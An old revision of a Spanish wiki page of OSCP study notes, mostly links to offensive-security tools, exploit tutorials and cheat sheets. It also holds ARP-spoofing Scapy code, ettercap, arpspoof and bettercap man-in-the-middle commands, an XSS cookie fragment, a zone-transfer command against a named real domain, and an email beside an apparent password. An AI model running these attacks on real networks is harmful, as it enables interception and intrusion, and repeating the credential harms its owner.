Herramientas de usuario

Herramientas del sitio


enlaces:seguridad:certificaciones:oscp

¡Esta es una revisión vieja del documento!


Profesional certificado en seguridad ofensiva (OSCP)

Profesional certificado en seguridad ofensiva (OSCP) es una certificación de ethical hacking ofrecida por Offensive Security que enseña metodologías de exámenes de penetración y utilizan herramientas incluyendo el examen de pentración BackTrack (ahora realizado con éxito con la distribución Kali Linux)1​2​ La certificación OSCP consiste en un examen práctico que requiere atacar y penetrar de manera satisfactoria varias maquinas en un ambiente seguro controlado.3​ Actualmente, es una de las pocas certificaciones que requiere evidencia de las habilidades en la parte práctica que consiste en una prueba de penetración.

Referencias para prepararse

  • shi_ver_bot : A Telegram bot to see if your password was in the BreachCompilation

beef project

sitio de boca buscar alert(document.cookie)</script>

https://www.netcraft.com/

https://www.seleniumhq.org/

https://panopticlick.eff.org/

https://beefproject.com/

dig @200.111.157.67 unap.cl -t AXFR

https://www.acunetix.com/

https://github.com/1N3/Sn1per

portnocking

https://blog.wpscans.com/sniff-wordpress-login-credentials-wireshark-http-connection/

https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://kali.training/lessons/introduction/

https://kali.training/topic/introduction-to-kali-linux/

https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/ https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/

https://smarterworkspaces.kyocera.es/blog/certificacion-seguridad-informatica-cuales-las-principales/

(ip.addr == 10.168.40.145) and (!udp contains “HTTP/1.1”)

https://tools.kali.org/information-gathering/nmap

ip.src == 192.168.0.99 && tcp.flags.syn==1 && tcp.flags.ack==1

https://3.14.by/en/md5

https://github.com/alearea51/IKn0wU

https://github.com/TunisianEagles/SocialBox

https://github.com/gentilkiwi/mimikatz https://github.com/AlessandroZ/LaZagne

https://github.com/reconSF/python/blob/master/Syngress.Violent.Python.a.Cookbook.for.Hackers.2013.pdf

https://github.com/vk496/linset

https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/manual-basico-de-wifislax-y-sus-herramientas-de-auditoria/

https://github.com/WifiPhisher

https://github.com/xtr4nge/FruityWifi

scapy

a = ARP(op=“who-has”, psrc=“192.168.168.2”, pdst=“192.168.168.131”, hwdst=“fe80::4067:2e3f:d06:61bd”)
send(a, inter=3, loop=1)

a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“fe80::4067:2e3f:d06:61bd”)

10.168.40.1

ip a falsear ip victima mac victima a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“08:00:27:52:2D:A0”)

send(a, inter=3, loop=1)

ettercap

ettercap -T -q -i eth0 -P dns_spoof -M arp /10.168.40.145/ └──╼ #tcpdump -n -i wlan0 -e 'arp or icmp' arping -c 1 -I wlan0 10.168.40.1 ARPING 10.168.40.1 60 bytes from 08:00:27:7e:b5:f7 (10.168.40.1): index=0 time=1.363 msec 60 bytes from 00:17:c5:15:81:6a (10.168.40.1): index=1 time=2.670 msec — 10.168.40.1 statistics — https://sandilands.info/sgordon/arp-spoofing-on-wired-lan mitmproxy arpspoof -i eth0 -t 10.168.40.70 10.168.40.1 iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 8080 mitmproxy –mode transparent —- bettercap -T ipvictima –proxy -P https://github.com/byt3bl33d3r/MITMf https://backtrackacademy.com/articulo/saltando-hsts-con-man-in-the-middle-framework http://www.elladodelmal.com/2016/03/ataques-man-in-middle-hsts-sslstrip-2.html https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/ w2af http://exploitpack.com/ ——— WIFI https://github.com/xtr4nge/FruityC2 —– android https://github.com/M4sc3r4n0/Evil-Droid extra https://github.com/nixawk/pentest-wiki https://geekflare.com/online-scan-website-security-vulnerabilities/ otra https://es.scribd.com/document/13213787/CUH-E-zine-4%C2%AA-Edicion https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng https://www.aircrack-ng.org/doku.php?id=es:deauthentication https://www.offensive-security.com/metasploit-unleashed/ https://blog.segu-info.com.ar/2018/09/examen-de-prueba-para-estudiantes-del.html https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp OSCP https://www.sniferl4bs.com/2015/11/entrenando-en-casa-para-rendir-el-oscp.html https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97 https://support.offensive-security.com/#!pwk-support.md https://support.offensive-security.com/#!oscp-exam-guide.md https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf https://www.securitysift.com/offsec-pwb-oscp/ https://www.adampalmer.me/iodigitalsec/2013/04/11/offensive-security-pwb-course-and-oscp-certification-review/ https://vcatalan.com/2017/01/OSCP-part-I-preparacion-estudio-previo.html https://mytcpip.com/2017/08/10/taller-de-hacking-i-nmap-a-fondo-metasploit-basico/ https://null-byte.wonderhowto.com/forum/upload-shell-from-phpmyadmin-xampp-by-mohamed-ahmed-0179931/ https://www.exam-labs.com/exam/NSE4#tutorial https://www.ihacklabs.com/es/el-mejor-sistema-de-pivoting-en-linux/ https://wiki.wireshark.org/SampleCaptures https://www.ubuntupit.com/an-ultimate-list-of-ethical-hacking-and-penetration-testing-tools-for-kali-linux/?fbclid=IwAR2szRvngTnDw8X7sETTlDH7letMnJriTBNSWYe_P4t49VVScqdxS2gWhV8 https://openwall.info/wiki/ https://github.com/ibr2/pwk-cheatsheet https://www.keiththome.com/oscp-course-review/ http://fl3x.us/blog/2015/09/22/order-wireless-devices-for-wifu-course/ https://amonsec.net/course/offensive-security-pwk-course-review https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/ https://www.ihacklabs.com/es/certificacion-osce-review-cracking-the-perimeter-ctp/ http://www.vividmachines.com/shellcode/shellcode.html https://www.securitysift.com/offsec-ctp-osce/ https://hackforums.net/member.php cayuqueo@gmail.com EBM1JUD1yq57pmgUAiqHQ http://nixware.net/my-osce-journey http://www.cs.virginia.edu/~evans/cs216/guides/x86.html https://www.pentesteracademy.com/topics https://openwall.info/wiki/p_lkrg/Main https://github.com/tanc7/hacking-books https://github.com/tanc7 https://infosecuritygeek.com/vulnhub-kioptrix-2014/ http://www.securitysift.com/offsec-pwb-oscp/ https://xapax.gitbooks.io/security/content/ https://medium.com/@bondo.mike/ptp-lab-privilege-escalation-with-services-5d14a99a28d1 https://github.com/xapax/oscp https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19 Cupp para crear diccionarios git clone https://github.com/Mebus/cupp.git Generar ataques de Bruteforce a redes sociales git clone https://github.com/TunisianEagles/SocialBox.git Dump de passwords (Volcado de memoria) https://github.com/AlessandroZ/LaZagne Cracking WPA/WPA2 con phishing https://github.com/vk496/linset https://github.com/wifiphisher/wifiphisher instabridge –mode transparent mitm.it/cert/p12 bettercap -T [ip_victima] –proxy -P Evil-Droid git clone https://github.com/M4sc3r4n0/Evil-Droid.git https://www.giuspen.com/cherrytree/ https://github.com/mikaelkall/HackingAllTheThings https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/ https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1 https://github.com/so87/OSCP-PwK https://medium.com/@chennylmf/hackthebox-lame-c28b19558cb0 https://github.com/OlivierLaflamme/Cheatsheet-God https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://medium.com/@chennylmf/hackthebox-walkthrough-tartarsauce-810a8df296c1 https://www.giuspen.com/cherrytree/ http://www.fuzzysecurity.com/tutorials/16.html Good reviews of CTP/OSCE (in no particular order): Note: * mark means look for other posts on this blog https://www.jollyfrogs.com *http://www.securitysift.com/offsec-ctp-osce/ *http://buffered.io/posts/osce-and-me/ http://www.iodigitalsec.com/offensive-security-ctp-course-and-osce-certification-review/ *http://ethicalhacker.io/post/137403906740/osce-exam-prep https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/ *https://infamoussyn.com/resources/ http://www.vividmachines.com/shellcode/shellcode.html http://www.primalsecurity.net/course-review-osce/ *http://netsec.ws/?p=517 http://tekwizz123.blogspot.sg/2014/09/osce-review-and-experience.html https://networkfilter.blogspot.sg/2016/01/my-osce-review.html https://www.blogtecnico.net/certificacion-osce-review-cracking-the-perimeter-ctp/ * https://github.com/reider-roque http://shell-storm.org/shellcode/ Tutorial sites (more stars = better/recommended): https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/ http://www.0daysecurity.com/pentest.html http://ly0n.me/2015/10/19/lfi-beyond-procselfenviron/ http://phrack.org/issues/62/7.html *http://0xdabbad00.com/2012/12/09/hurdles-for-a-beginner-to-exploit-a-simple-vulnerability-on-modern-windows/ https://community.rapid7.com/community/metasploit/blog/2012/07/05/part-1-metasploit-module-development--the-series * http://resources.infosecinstitute.com/intro-to-fuzzing/ * https://madmantm.wordpress.com/ https://www.fuzzysecurity.com/tutorials.html https://www.corelan.be/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/ http://netsec.ws/?p=180 http://netsec.ws/?p=430 http://netsec.ws/?cat=57 http://blog.stalkr.net/2011/04/pctf-2011-22-hashcalc1.html https://ionize.com.au/its-all-about-inclusion/ https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ https://www.idontplaydarts.com/2011/03/php-remote-file-inclusion-command-shell-using-data-stream/ https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/ https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ https://sites.google.com/site/xssvulnerabilities/bypassing-browser-anti-xss-filters http://carnal0wnage.attackresearch.com/ https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/ https://www.kernel-exploits.com/ http://www.thegreycorner.com/2010/01/seh-stack-based-windows-buffer-overflow.html http://www.thegreycorner.com/2010/02/windows-buffer-overflow-tutorial.html http://www.thegreycorner.com/2010/01/beginning-stack-based-buffer-overflow.html https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ https://www.corelan.be/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/ https://www.corelan.be/index.php/2010/03/27/quickzip-stack-bof-0day-a-box-of-chocolates/ https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/ https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/ https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/ https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/ https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/ https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ https://sites.google.com/site/xssvulnerabilities/bypassing-browser-anti-xss-filters * https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/ https://github.com/sploitfun/lsploits http://blog.pusheax.com/2013/03/exploit-writing-stack-based-buffer.html http://www.keystone-engine.org/docs/tutorial.html http://resources.infosecinstitute.com/analysis-of-malware-samples/ http://www.fuzzysecurity.com/tutorials/7.html * https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/ http://phrack.org/issues/67/13.html http://www.securepla.net/ * http://programming4.us/security/688.aspx http://resources.infosecinstitute.com/buffer-overflow-vulnserver/ * http://www.primalsecurity.net/0x8-exploit-tutorial-the-elusive-egghunter/ https://blog.techorganic.com/2014/05/14/from-fuzzing-to-0-day/ * http://www.flinkd.org/2011/07/fuzzing-with-peach-part-1/ http://realpentesting.blogspot.sg/2013/04/0day-bug-hunting-realpentesting.html https://samsclass.info/127/proj/vuln-server.htm http://www.rockfishsec.com/2014/01/fuzzing-vulnserver-with-peach-3.html * http://www.thegreycorner.com/p/vulnserver.html * http://resources.infosecinstitute.com/seh-exploit/ *https://www.offensive-security.com/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/ Cheatsheets: https://highon.coffee/blog/lfi-cheat-sheet/ http://ethicalhacker.io/post/137403906740/osce-exam-prep https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet http://htmlpurifier.org/live/smoketests/xssAttacks.php https://www.bnxnet.com/wp-content/uploads/2015/01/WinAPIs_for_hackers.pdf http://www.securepla.net/wiki/index.php?title=Cheat_Sheets http://www.securepla.net/wiki/index.php?title=Network_Attack_Cheat_Sheet https://www.securepla.net/wiki/index.php?title=Web_App_Cheat_Sheet http://www.securepla.net/wiki/index.php?title=Web_Scanning_Cheat_Sheet http://www.securepla.net/wiki/index.php?title=Malware_Cheat_Sheet http://sparksandflames.com/files/x86InstructionChart.html Good practice sites: http://www.primalsecurity.net/tutorials/exploit-tutorials/ http://www.securitysift.com/windows-exploit-development-part-6-seh-exploits/ https://v00d00sec.com/2015/09/14/manually-backdooring-windows-executables/ https://www.corelan.be/index.php/articles/ http://fuzzysecurity.com/tutorials.html http://exploit-exercises.com/protostar http://exploit-exercises.com/fusion http://ihazomgsecurityskillz.blogspot.com/ http://opensecuritytraining.info/Training.html https://trailofbits.github.io/ctf/index.html http://tuts4you.com/download.php?list.17 http://tuts4you.com/download.php?list.29 http://tuts4you.com/download.php?list.3 http://www.openrce.org/downloads/ http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/index.html http://tuts4you.com/download.php?list.67 http://www.binary-auditing.com/ https://blog.g0tmi1k.com/dvwa/index/ http://www.vividmachines.com/shellcode/shellcode.html https://www.exploit-db.com/exploits/17527/ https://www.exploit-db.com/exploits/11834/ https://www.exploit-db.com/exploits/11872/ https://www.exploit-db.com/exploits/11764/ https://www.exploit-db.com/exploits/11656/ https://www.exploit-db.com/exploits/33453/ https://github.com/WebGoat/WebGoat http://www.gironsec.com/blog/2016/06/backdooring-a-dll/ http://blog.knapsy.com/blog/2015/11/25/easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/ https://www.offensive-security.com/0day/quick-tftp-poc.py.txt https://www.exploit-db.com/author/?a=278 https://samsclass.info/127/proj/p4-lbuf-shell.htm http://www.securitysift.com/windows-exploit-development-part-1-basics/ * https://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/ * https://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/ *** http://www.vividmachines.com/shellcode/shellcode.html Vulnerable machines: vulnhub VMs: SickOS 1.1 SickOS 1.2 Droopy v0.2 Kevgir Pegasus SecTalks: BNE0x00 - Minotaur SecTalks: BNE0x03 - Simple NullByte: 1 FristiLeaks 1.3 OWASP Vulnerable Web Applications Directory Project Mutillidae Damn Vulnerable Web Application LFI/RFI https://penetrate.io/2014/01/10/from-rfi-to-shell/ Backdooring files with Python: https://github.com/secretsquirrel/the-backdoor-factory eBooks downloads: http://www.ebook777.com/gray-hat-hacking-ethical-hackers-handbook-fourth-edition/ https://github.com/JpGallegos/CySecBooks https://www.securepla.net/the-hacker-playbook-2/ “Hacking: The Art of Exploitation” https://www.linkedin.com/pulse/osce-cracking-perimeter-experience-sunny-neo - Fuzzing (Scapy, TAO, Sulley) - Linux Exploitation (vanila stack overflow, return to Glibc - NX bypass, repairing stack canaries, ASLR bypasses) and Windows exploitation (SEH overwrite, Return Oriented Programming into disabling DEP) - Web Application Hacker's Handbook (might be too large: Consider “webgoat”) Various sites: http://www.sweetscape.com/ (010 Editor) https://github.com/campagnola/pycca https://github.com/Gallopsled/pwntools https://github.com/reyammer/shellnoob https://zeltser.com/convert-shellcode-to-assembly/ http://files.cnblogs.com/files/exclm/ollydbg_cmdline_cheat_sheet.pdf http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html https://www.digitalocean.com/community/tutorials/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps https://github.com/peterferrie/win-exec-calc-shellcode http://www.secniu.com/why-my-shellcode-cannot-work/ http://thestarman.pcministry.com/asm/2bytejumps.htm http://blog.noobroot.com/ https://www.exploit-db.com/exploits/5342/ http://exploit.co.il/hacking/manual-egghuntershellcode-encoding/ https://github.com/salcho/codetz http://xangosec.blogspot.sg/2014/08/automating-sub-encoder.html http://www.fuzzing.org/ http://resources.infosecinstitute.com/pattern-based-approach-memory-shellcodes-detection/ https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/ https://0x41.no/hacking-networks-with-snmp/ http://danielebellavista.blogspot.sg/2014/10/ia32-shellcodes-get-eip-value.html http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/ http://codemachine.com/downloads.html Fun random stuff: http://patriciopalladino.com/files/hieroglyphy/ http://n01g3l.tumblr.com/ https://twitter.com/ch3rn0byl/status/832681279900487680 https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/ https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/ https://github.com/vanhoefm/modwifi https://github.com/vanhoefm/blackhat17-pocs https://github.com/0x90/uberscapy https://github.com/0x90/wifi-arsenal https://github.com/0x90/kali-scripts

enlaces/seguridad/certificaciones/oscp.1543245545.txt.gz · Última modificación: 2018/11/26 15:19 por cayu